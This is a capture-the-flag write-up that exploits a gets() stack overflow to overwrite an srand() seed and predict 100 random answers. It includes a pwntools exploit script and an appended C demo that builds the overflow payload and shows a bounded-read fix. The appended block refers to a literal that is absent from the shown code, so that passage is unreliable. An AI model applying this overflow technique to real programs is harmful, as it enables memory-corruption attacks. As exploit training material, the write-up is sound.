Tags: pwn 


## TROLL (50pts) ##


In this task we are supposed to win a game by guessing the next 100 random numbers. Looking at the source code we can see the vulnerable gets call (it reads a line into a stack buffer with no length check), the seed value being set from the time, and finally the loop that generates a random number and asks the question each round. Since rand() is fully determined by the value passed to srand(), whoever controls the seed can reproduce all 100 numbers in advance.


My idea was to overwrite the seed value with our own value; then BINGO, we can generate the next random numbers and win the game. I did this manually: I entered a unique sequence and then observed in gdb whether I had overwritten the place where the seed value is stored.

My input:


I entered a sequence of alphabet characters and stopped at the call to the srand function; you can see the RDI register (where the 1st argument passed to a function is stored) holds the value "MMMM",
so if we replace "MMMM" with the value we want, this value will be the seed for the random numbers.

I wrote this little C program to generate 100 random numbers using our chosen seed and store them in a file:

```c
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
    unsigned seed = argc > 1 ? strtoul(argv[1], NULL, 0) : 0x1000; /* the seed we plant (0x1000 = 4096) */
    FILE *f = fopen("answers.txt", "w"); if (!f) return 1;        /* one number per line, read by the exploit */
    srand(seed);
    for (int i = 0; i < 100; i++)
        fprintf(f, "%d\n", rand() % 100000 + 1);   /* same formula as the challenge */
    return fclose(f);
}
```

After that I wrote this exploit to overwrite the seed value with 0x1000 and answer the questions using the numbers we generated:

```python
from pwn import *
OFFSET = 48                 # assumed: distance from the gets() buffer to the seed, measured in gdb
p = process("./troll")      # binary name assumed; use remote(host, port) against the server
answers = open("answers.txt").read().split()   # file written by the C generator (name assumed)
p.recvuntil(b"Who goes there?")
p.sendline(b"A" * OFFSET + p32(0x1000))       # filler up to the seed, then the seed value
log.info("Sent First payload")
for line in answers:
    p.recvuntil(b"What is it?")
    log.info("sending answer: " + line)
    p.sendline(line.encode())
p.interactive()
```

Note: the offset on the remote server is different, so I had to guess it xD However, we got our flag:
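The whole chain above in one self-contained C program, as an added example (it is neither the challenge binary nor the author's code): a struct stands in for the stack frame so that the unbounded read overflows into the seed, the alphabet pattern yields the offset from the observed "MMMM", and the answers are predicted by seeding rand() with the planted value, next to a bounded read that the same input cannot reach. The buffer size (48) and the 4-wide pattern groups are assumptions chosen so the demo reproduces the "MMMM" observation; on a real target the offset has to be measured, as the note above says. The block also checks one detail of the C helper: the literal 3472328296227680305 is 0x3030303030303031, the ASCII bytes "10000000", and stored in an int only the low 32 bits 0x30303031 (the bytes "1000") remain, which is not 0x1000; whichever value is used, the bytes the payload plants and the argument handed to srand() must agree exactly.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Stand-in for the challenge's stack frame (assumed layout): the name buffer read with
 * gets() directly precedes the variable srand() receives, so overflowing it clobbers the
 * seed; a struct forces the same adjacency. NAME_LEN is an assumption picked so that the
 * 4-wide alphabet pattern drops "MMMM" into the seed, as in the writeup's gdb session. */
#define NAME_LEN 48
struct game_frame {
    char name[NAME_LEN];
    uint32_t seed;   /* 4-byte int: the "MMMM" seen in RDI at the srand() call */
};

/* Emulates gets(): copies the whole line with no bound check. The cap at the frame
 * size only keeps this demo from smashing its own stack; real gets() has none. */
static void unsafe_read(struct game_frame *f, const char *line, size_t len) {
    if (len > sizeof *f) len = sizeof *f;
    memcpy(f, line, len);   /* bytes past NAME_LEN land in f->seed */
}

/* Hardened read (fgets-style bound): the seed can never be reached. */
static void safe_read(struct game_frame *f, const char *line, size_t len) {
    if (len > NAME_LEN - 1) len = NAME_LEN - 1;
    memcpy(f->name, line, len);
    f->name[len] = '\0';
}

/* Input like the writeup's: AAAABBBBCCCC..., each letter repeated `group` times. */
static void alphabet_pattern(char *out, size_t out_len, size_t group) {
    size_t i;
    for (i = 0; i + 1 < out_len; i++) out[i] = (char)('A' + (i / group) % 26);
    out[i] = '\0';
}

/* Offset in that pattern of the value seen in the register, e.g. "MMMM" -> 48. */
static size_t pattern_offset(const char *observed, size_t group) {
    return (size_t)(observed[0] - 'A') * group;
}

/* Real payload: filler up to the seed, then the 4 seed bytes (little-endian on x86-64). */
static size_t build_payload(char *out, size_t offset, uint32_t seed) {
    memset(out, 'A', offset);
    memcpy(out + offset, &seed, sizeof seed);
    return offset + sizeof seed;
}

/* What the writeup's C helper does: the 100 answers for a known seed. */
static void predict_answers(uint32_t seed, int *out, int n) {
    srand(seed);
    for (int i = 0; i < n; i++) out[i] = rand() % 100000 + 1;
}

/* The game loop as the writeup describes it: srand(seed), then compare each guess. */
static int play_game(const struct game_frame *f, const int *guesses, int n) {
    srand(f->seed);
    for (int i = 0; i < n; i++)
        if (guesses[i] != rand() % 100000 + 1) return 0;   /* wrong guess: lost */
    return 1;                                               /* all matched: won */
}

/* Step 1 of the writeup: overflow with the pattern and read back what reached the seed. */
static uint32_t seed_after_pattern(void) {
    struct game_frame f = { {0}, 0 }; char pattern[64];
    alphabet_pattern(pattern, sizeof pattern, 4);
    unsafe_read(&f, pattern, strlen(pattern) + 1);
    return f.seed;   /* 0x4d4d4d4d == "MMMM" */
}

/* Step 2: plant `planted` through the overflow, then answer with the sequence for `guessed`. */
static int exploit_wins(uint32_t planted, uint32_t guessed) {
    struct game_frame f = { {0}, 0 }; char payload[64]; int answers[100];
    size_t len = build_payload(payload, pattern_offset("MMMM", 4), planted);
    unsafe_read(&f, payload, len);
    predict_answers(guessed, answers, 100);
    return play_game(&f, answers, 100);
}

/* Same pattern through the bounded read: a seed set before the read survives intact. */
static int safe_read_keeps_seed(void) {
    struct game_frame f = { {0}, 0x1234 }; char pattern[64];
    alphabet_pattern(pattern, sizeof pattern, 4);
    safe_read(&f, pattern, strlen(pattern));
    return f.seed == 0x1234 && strlen(f.name) == NAME_LEN - 1;
}

/* The page's literal 3472328296227680305 is 0x3030303030303031 (the ASCII bytes
 * "10000000"); stored in an int only the low 32 bits, 0x30303031 == "1000", remain. */
static uint32_t page_literal_as_int(void) {
    return (uint32_t)3472328296227680305ULL;
}

int main(void) {
    printf("seed after pattern: 0x%08x (offset %zu)\n", seed_after_pattern(), pattern_offset("MMMM", 4));
    printf("planted 0x1000, guessed 0x1000: %d; guessed 0x1001: %d\n",
           exploit_wins(0x1000, 0x1000), exploit_wins(0x1000, 0x1001));
    printf("bounded read keeps seed: %d; page literal as int: 0x%08x\n",
           safe_read_keeps_seed(), page_literal_as_int());
    return 0;
}
```

Two caveats a practitioner would add: writing 4 bytes at the measured offset only works if the seed really sits right after the buffer on the target, which is why the remote offset had to be re-guessed; and the underlying weakness is rand() seeded from time(), so even without the overflow the seed is guessable to within a few seconds of the connection.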


This is the first time I have written a pwn writeup, so I hope you enjoyed it. Any questions, you can find me on twitter @BelkahlaAhmed1

Original writeup (https://github.com/kahla-sec/CTF-Writeups/tree/master/TAMU%20CTF/TROLL).